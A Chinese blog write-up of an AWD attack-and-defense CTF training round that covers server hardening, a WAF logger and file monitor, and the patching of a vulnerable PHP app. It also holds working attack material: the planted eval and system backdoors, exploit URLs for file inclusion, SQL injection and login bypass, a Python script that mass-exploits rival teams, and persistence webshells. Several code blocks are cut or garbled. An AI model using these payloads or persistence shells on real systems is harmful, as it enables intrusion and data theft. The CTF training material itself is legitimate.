AWD之赛前赛后

0xdawn

作为一名资深懒狗,距离上一次星盟四月AWD训练赛过去一个月,在五月训练前才开始整理AWD,请大佬轻锤。

训练赛使用的是实验室自研的H1ve平台,强行安利一下H1ve顺便吹一波彭锅

赛后总结我拿的是第一道题web_yunnan_simple来写的

上线后

上线一定要快,晚点上线人家马都给你安排上了

修改ssh密码

passwd username //回车输入新密码

备份源码

tar -zcvf /tmp/web.tar.gz /var/www/html/*	//tar打包(注意:shell 的 * 不会匹配以 . 开头的隐藏文件,要连隐藏文件一起备份请直接写 /var/www/html)

定期备份的话因人而异,我不是很喜欢用

crontab backupcrontab.txt

backupcrontab.txt中写入

0 1 * * * tar -zcvf /tmp/web.tar.gz /var/www/html/*

详见:Linux中使用crontab设置定时任务

预留后门查杀

  • D盾
  • WebShellKiller

config.php

// Pre-planted backdoor found in config.php: evaluates whatever arrives in the `c` request parameter. Delete this line.
@eval($_REQUEST['c']);

payload:
http://106.52.236.34:10180/config.php?c=system(%27cat%20/flag%27);

footer.php

// Pre-planted backdoor found in footer.php: passes the POSTed `shell` value straight to system(). Delete both lines.
$shell=$_POST['shell'];
system($shell);

payload:
POST
shell=cat /flag

admin/footer.php同上

admin/header.php



payload:
http://106.52.236.34:10180/admin/header.php?p=cat%20/flag

修改Mysql密码

mysql -u root -p	//登陆后用以下命令
set password for root@localhost=password('新密码');

备份数据库

账号密码一般在config.php,如果修改了密码记得修改config.php

备份:mysqldump -u root -p dbname>db.sql
还原:create database tmp;
	 use tmp;
	 source db.sql

修改admin默认密码

update admin set user_pass='新密码' where user_name='admin';

上回只补了login页面的sql注入,没注意到默认密码可以一直登录拿flag

添加脚本

流量监控

郁离歌大佬的waf

 $value) { 
if (substr($name, 0, 5) == 'HTTP_') 
$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
} 
return $headers; 
} 
} 
$get = $_GET; 
$post = $_POST; 
$cookie = $_COOKIE; 
$Session = $_SESSION;  // added
$header = getallheaders(); 
$files = $_FILES; 
$ip = $_SERVER["REMOTE_ADDR"]; 
$method = $_SERVER['REQUEST_METHOD']; 
$filepath = $_SERVER["SCRIPT_NAME"]; 
foreach ($_FILES as $key => $value) { 
$files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']); 
file_put_contents($_FILES[$key]['tmp_name'], "virink"); 
}

unset($header['Accept']);
$input = array("Get"=>$get, "Post"=>$post, "Cookie"=>$cookie, "File"=>$files, "Session"=>$_SESSION,"Header"=>$header);

logging($input);

}

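/**
 * Appends a dump of the current request to a per-client log file.
 *
 * @param mixed $var  Whatever should be recorded (the waf() caller hands over the
 *                    array of GET/POST/Cookie/File/Session/Header data); it is
 *                    rendered with print_r().
 *
 * The log file is LOG_FILEDIR."/".<REMOTE_ADDR>. REMOTE_ADDR is filled in by the
 * web server, not by the client, so it is safe to use as a file name; do not
 * replace it with X-Forwarded-For or a similar header without validating it,
 * or a client could steer the path. LOG_FILEDIR must be defined by the
 * including file.
 */
function logging($var){
    $filename = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    $LOG_FILENAME = LOG_FILEDIR."/".$filename;
    $time = date("Y-m-d G:i:s");
    // These fields are not always present (CLI, HTTP/1.0, no query string).
    $host  = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
    $self  = isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : '';
    $query = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';
    // One locked append instead of three separate ones, so concurrent requests
    // from the same address cannot interleave their entries.
    $entry = "\r\n".$time."\r\n".print_r($var, true)
           ."\r\n".'http://'.$host.$self.'?'.$query
           ."\r\n***************************************************************";
    file_put_contents($LOG_FILENAME, $entry, FILE_APPEND | LOCK_EX);
}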

waf();

使用方法:

在所有php文件中加入 `require_once('waf.php');`

懒狗的话直接找个公用文件,如config.php,然后包含waf

或者修改php.ini文件

Automatically add files before or after any PHP document.
auto_prepend_file = /var/www/html/waf.php;

另外一个功能更强大的:

https://github.com/wupco/weblogger

文件监控

dir = $this->getparam($argv);
		$this->getfiles($this->dir);
		print "[+] total:".count($this->files[$this->i])."\n\r";
		$this->i++;
		while(true)
		{
			$this->getfiles($this->dir);
			if(isset($this->files[$this->i-1]) && ((count($this->files[$this->i])>count($this->files[$this->i-1]))))
			{
				print "[+] total:".count($this->files[$this->i])."\n\r";
				print "[*] addfile: ".implode('|',array_diff($this->files[$this->i],$this->files[$this->i-1]))."\n\r";
			}
			if(isset($this->files[$this->i-1]) && ((count($this->files[$this->i])files[$this->i-1]))))
			{
				print "[+] total:".count($this->files[$this->i])."\n\r";
				print "[*] deletefile: ".implode('|',array_diff($this->files[$this->i-1],$this->files[$this->i]))."\n\r";
			}
			if(isset($this->filesize[$this->i-1]))
			{
				array_map(function($v,$val,$key){
					if($v != $val)
					{
						print "[*] updatefile:{$key}\n\r";
					}
				},$this->filesize[$this->i-1],$this->filesize[$this->i],array_keys($this->filesize[$this->i]));
			}
			$this->i++;
			if($this->i>=30)
			{
				$this->files = [];
				$this->filesize = [];
				$this->i = 0;
			}
		}
	}

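	/**
	 * Reads the directory to watch from the command line.
	 *
	 * @param array $argv  Raw CLI arguments; the value following "--dir" is used.
	 * @return string      The directory path exactly as given on the command line.
	 *
	 * Terminates the script with a message when "--dir" is absent, has no value,
	 * or names something that is not a directory. The original returned null in
	 * the first two cases and the caller then tried to scan null.
	 */
	private function getparam($argv)
	{
		foreach ((array) $argv as $key => $val) {
			if ($val !== "--dir") {
				continue;
			}
			$next = $key + 1;
			// The index after "--dir" may simply not exist (last argument).
			if (!isset($argv[$next]) || !is_dir($argv[$next])) {
				exit("[-] directory does not exist!");
			}
			return $argv[$next];
		}
		exit("[-] usage: --dir <directory>");
	}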

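	/**
	 * Recursively records every file under $dir into the snapshot for the
	 * current round ($this->i): the path is appended to $this->files[$this->i]
	 * and its size stored in $this->filesize[$this->i][path]. When $dir is not
	 * a directory it is recorded as a single file. Dot-prefixed entries other
	 * than "." and ".." are included, so hidden files such as ".header.php" are
	 * covered by the snapshot.
	 *
	 * @param string $dir  Directory (or file) to scan.
	 */
	private function getfiles($dir)
	{
		if (!is_dir($dir)) {
			$this->files[$this->i][] = $dir;
			$this->filesize[$this->i][$dir] = filesize($dir);
			return;
		}
		$entries = scandir($dir);
		if ($entries === false) {
			// Unreadable directory: skip it rather than iterating over false.
			return;
		}
		foreach ($entries as $entry) {
			if ($entry === '.' || $entry === '..') {
				continue;
			}
			$path = "{$dir}/{$entry}";
			if (is_dir($path)) {
				$this->getfiles($path);
			} else {
				$this->files[$this->i][] = $path;
				$this->filesize[$this->i][$path] = filesize($path);
			}
		}
	}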
}
// CLI entry point: print the banner, then hand the command line to the monitor.
print " 
    _____________
   < FileMonitor >
    -------------
      /\_)o<
     |       | 
     | O . O |
      \_____/
    By CoolCat
";
// $argv is only populated under the CLI SAPI; the constructor reads --dir from it
// and then loops forever printing added, deleted and changed files.
new FileMonitor($argv);
?>

用法

php fileMonitor.php --dir ./

代码审计

文件包含

about.php

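// Original about.php did `include $_GET['file'];` with no check, so any path the
// web server could read was includable (arbitrary file inclusion / traversal).
// The patch resolves the request against an allowlist of page files instead.

/**
 * Maps the raw `file` request value to a page this script may include.
 *
 * @param string $requested  Value of $_GET['file'] ('' when absent).
 * @param array  $allowed    Exact file names about.php legitimately includes.
 * @return string|null       The allowed name, or null when it is not listed.
 */
function about_page_from_request($requested, array $allowed)
{
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    // Strict comparison: no type juggling between the request value and the list.
    return in_array($requested, $allowed, true) ? $requested : null;
}

// TODO(review): fill in the page files about.php is meant to include.
$allowed_pages = array(/* 'PLACEHOLDER_page.php' */);
$file = about_page_from_request(isset($_GET['file']) ? $_GET['file'] : '', $allowed_pages);
if ($file === null) {
    http_response_code(404);
} else {
    include $file;
}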

payload:
http://106.52.236.34:10180/about.php?file=../../../flag

contact.php

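// Original contact.php did fopen()/fread() on $_GET['path'] after only a
// file_exists() check, so any readable file could be echoed (path traversal).
// The patch resolves the request against an allowlist of files instead.

/**
 * Maps the raw `path` request value to a file this script may display.
 *
 * @param string $requested  Value of $_GET['path'] ('' when absent).
 * @param array  $allowed    Exact paths contact.php legitimately displays.
 * @return string|null       The allowed path, or null when it is not listed.
 */
function contact_file_from_request($requested, array $allowed)
{
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    return in_array($requested, $allowed, true) ? $requested : null;
}

// TODO(review): fill in the files contact.php is meant to display.
$allowed_files = array(/* 'PLACEHOLDER_contact.txt' */);
$file_path = contact_file_from_request(isset($_GET['path']) ? $_GET['path'] : '', $allowed_files);
if ($file_path !== null && file_exists($file_path)) {
    // file_get_contents replaces the fopen/fread pair the original never closed.
    $str = file_get_contents($file_path);
    if ($str !== false) {
        // Output stays raw as before; the allowlist is what makes it safe.
        echo $str = str_replace("\r\n", "\n", $str);
    }
}

payload:
http://106.52.236.34:10180/contact.php?path=../../../flag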

sql注入

login.php


用户名:',$user,'
密码:',$pass,'

用户名密码错误
'; } } ?> payload: username:admin' and 1=1# password:随便填

search.php



payload:
http://106.52.236.34:10180/search.php?id=-1%20union%20select%201,group_concat(user_name,0x7e,user_pass),3%20from%20test.admin%23

敏感信息泄露

admin/index.php

这里也挺鸡贼的,打到一半才发现这里直接就把flag给泄露出去了,admin登录直接拿到

flag:

admin/upload/1532851316.php


文件上传

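// Original upload handler kept the last four characters of the client-supplied
// file name as the extension and stored the file at ./upload/<timestamp><ext>,
// so a ".php" upload became an executable script at a predictable path. The
// patch allows only image extensions, names the file with random bytes, keeps
// the existing content check, and no longer echoes success when nothing was
// uploaded (the original printed an undefined $time in that case).

/**
 * Builds the destination path for an upload, or null when its extension is not allowed.
 *
 * @param string $name     Client-supplied file name (untrusted).
 * @param string $token    Unique part of the stored name.
 * @param array  $allowed  Lower-case extensions (no dot) that may be stored.
 * @return string|null     Path relative to the script, e.g. './upload/<token>.jpg'.
 */
function upload_target_path($name, $token, array $allowed)
{
    // pathinfo() takes the real last extension, so 'a.jpg.php' yields 'php'.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, $allowed, true)) {
        return null;
    }
    return './upload/' . $token . '.' . $ext;
}

// TODO(review): adjust to the types the application really needs.
$allowed_ext = array('jpg', 'jpeg', 'png', 'gif');

$error   = isset($_FILES['pic']['error']) ? $_FILES['pic']['error'] : UPLOAD_ERR_NO_FILE;
$tmpName = isset($_FILES['pic']['tmp_name']) ? $_FILES['pic']['tmp_name'] : '';
$name    = isset($_FILES['pic']['name']) ? $_FILES['pic']['name'] : '';
try {
    if ($error === UPLOAD_ERR_OK && $name !== "" && is_uploaded_file($tmpName)) {
        $time = time();
        // Random suffix: a bare timestamp let the uploader predict its file's URL.
        $token = $time . bin2hex(random_bytes(8));
        $rootpath = upload_target_path($name, $token, $allowed_ext);
        if ($rootpath === null) {
            exit("");
        }
        $content = file_get_contents($tmpName);
        if ($content === false) {
            die('No such file!');
        }
        if (strstr($content, 'fuck')) {
            exit("");
        }
        if (!move_uploaded_file($tmpName, $rootpath)) {
            echo "";
            exit;
        }
        echo "上传成功:" . substr($rootpath, 1);
    }
}
catch (Exception $e)
{
    echo "ERROR";
}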

//直接传一句话小马就行,没有任何过滤

文件上传的洞还不太会修,训练赛的时候尝试补了一下,但是页面直接挂了。所以我直接注释掉输出上传文件的位置,并且重命名时在时间戳后面再拼了一些东西,所以即使传了马也用不了。似乎也没被check的样子…

$rootpath='./upload/'.$time.'随便拼点东西进来'.$name1;

修补工作

open_basedir

  • 在php.ini中加入open_basedir="/var/www/html"
  • 在程序中加入ini_set('open_basedir', '/var/www/html');
  • 在apache的httpd.conf中的Directory配置php_admin_value open_basedir "/var/www/html"
  • httpd.conf中的VirtualHost中配置php_admin_value open_basedir "/var/www/html"
  • nginx fastcgi.conf:fastcgi_param PHP_VALUE "open_basedir=/var/www/html"

addslashes

$id=addslashes($id);	// Remember to wrap $id in single quotes in the SQL statement: addslashes() only helps inside a quoted string. For a numeric id, (int)$id or a prepared statement is the stronger fix.

批量打全场

打预留马

手速要快,预留的估计打个一两轮就没了,发现了就赶紧跑脚本打

import requests
import time


#GET
url = "http://106.52.236.34:1"
payload = "/config.php?c=system('cat /flag');"

for i in range(1,30):
    if (i <10):
        flag_url = url + "0" + str(i) + "80" + payload
    else:
        flag_url = url + str(i) + "80" + payload
    print(flag_url)
    r = requests.get(flag_url)
    if "flag" in r.text:
        print(r.text)
        print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
        time.sleep(1)


'''
#POST
url = "http://106.52.236.34:1"
payload = "/footer.php"
data = {'shell':'cat /flag'}

for i in range(1,30):
    if (i <10):
        flag_url = url + "0" + str(i) + "80" + payload
    else:
        flag_url = url + str(i) + "80" + payload
    print(flag_url)
    r = requests.post(flag_url,data=data)
    if "flag" in r.text:
        print(r.text)
        print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
        time.sleep(1)
'''

提交flag

#coding:utf-8
import requests
import re
import time

url = "http://ip:"
url1 = ""
shell = "/includes/config.php?d=system"
passwd = "c" 
port = "80"
payload = {passwd: 'cat /flag'}

flag_server = "http://flag_server/flag_file.php?token=%s&flag=%s"
teamtoken = "team1"

def submit_flag(target, teamtoken, flag):
    url = flag_server % (teamtoken, flag)
    pos = {}
    print "[+]Submitting flag:%s:%s" % (target, url)
    response = requests.post(url, data=pos)
    content = response.text
    print "[+]content:%s" % content
    if "success" in content:
        print "[+]Success!!"
        return True
    else:
        print "[-]Failed"
        return False


def flag():
    f=open("webshelllist.txt","w") 
    f1=open("firstround_flag.txt","w")
    for i in [8802,8803,8804]: 
        url1=url+str(i)+shell
        try:
            print "------------------------------------"
            res=requests.post(url1,payload,timeout=1)
            if res.status_code == requests.codes.ok:
                print url1 + " connect shell sucess,flag is "+res.text
                # 记录shell和获取的flag
                print >>f1,url1+" connect shell sucess,flag is "+res.text
                print >>f,url1+","+passwd
                # 正则捕获flag
                if re.match(r'hello world(\w+)', res.text):   
                    flag = re.match(r'hello world(\w+)', res.text).group(1)
                    submit_flag(url1, teamtoken, flag)
                else:
                    print "[-]Can not get flag"
            else:
                print "shell 404"
        except:
            print url1 + "connect shell failed"
    		
    f.close()
    f1.close()

def timer(n):
    while True:
        flag()
        flag()
        flag()
        time.sleep(n)

timer(300) # 一般为5分钟一轮

权限维持

软连接

ln -s /flag css/XXXXXXXX.css

一句话马


不死马

');
		}
		system('chmod 777 .header.php');
		touch("./.header.php",mktime(20,15,1,4,28,2019));
		usleep(100);
	}
?>

"system(base64_decode(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));"

核弹马




免杀一句话

待补充
